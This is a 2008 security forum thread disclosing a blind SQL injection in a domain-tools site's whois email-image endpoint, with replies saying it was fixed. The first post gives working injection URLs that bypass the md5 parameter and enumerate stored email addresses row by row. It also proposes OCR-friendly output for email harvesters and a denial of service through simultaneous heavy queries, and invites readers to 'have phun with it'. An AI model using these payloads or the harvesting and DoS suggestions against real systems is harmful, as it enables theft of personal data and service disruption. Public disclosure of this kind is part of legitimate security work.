Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
domaintools.com SQL Injection
Posted by: Shocker
Date: June 01, 2008 11:49AM

domaintools.com, one of the biggest websites with tools for domains such as domain suggestions, whois, blabla, vunerable to SQL injection in the whois module

In the whois page, emails are displayed as images, dynamically generated, something like:
Image link:
http://source.domaintools.com/email.pgif?md5=7133c94ef8eb1e9984b110651d2cd92e&face=Atomic_Clock_Radio&size=7&color=000000&bgcolor=FFFFFF&format[]=transparent&face=Trebuchet&size=9&color=0000FF&bgcolor=FFFFFF&format[]=underline&format[]=transparent

The md5 get parameter is used directly&nonfiltered in the SQL query, poc:
hxxp://source.domaintools.com/email.pgif?md5=' or md5='7133c94ef8eb1e9984b110651d2cd92e
(7133c94ef8eb1e9984b110651d2cd92e = md5 hash for shocker@freakz.ro)

Unfortunately this is a blind sql injection, no errors, no nothing, it may be used to disclose whatever they have in their db, but we got no table names, field names or column count for the initial select, sucks.
The field that holds the email in plaintext is email, poc:
hxxp://source.domaintools.com/email.pgif?md5=' or email='shocker@freakz.ro
Doing this will result in a very delayed page load because of the huge size of their datebase and the fact they don't have any index assigned for the email field, just for the md5 field.

Even a full email listing can be done
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 0,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 1,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 2,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 3,1 --%20
...
use the other GET parameters to output the text with some monospaced font to easily create an OCR software (for email harversters)

Maybe even a denial of service if we make some simultaneously requests with OR 1=1, or email='blabla', w/e, have phun with it faster if you really want to take advantage of it

hackpedia.info | Shocker's ShockingSoft

Options: ReplyQuote
Re: domaintools.com SQL Injection
Posted by: Shocker
Date: June 02, 2008 05:44PM

mhm, fixed

hackpedia.info | Shocker's ShockingSoft



Edited 1 time(s). Last edit at 06/02/2008 05:45PM by Shocker.

Options: ReplyQuote
Re: domaintools.com SQL Injection
Posted by: rsnake
Date: June 09, 2008 10:02AM

That was quick!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.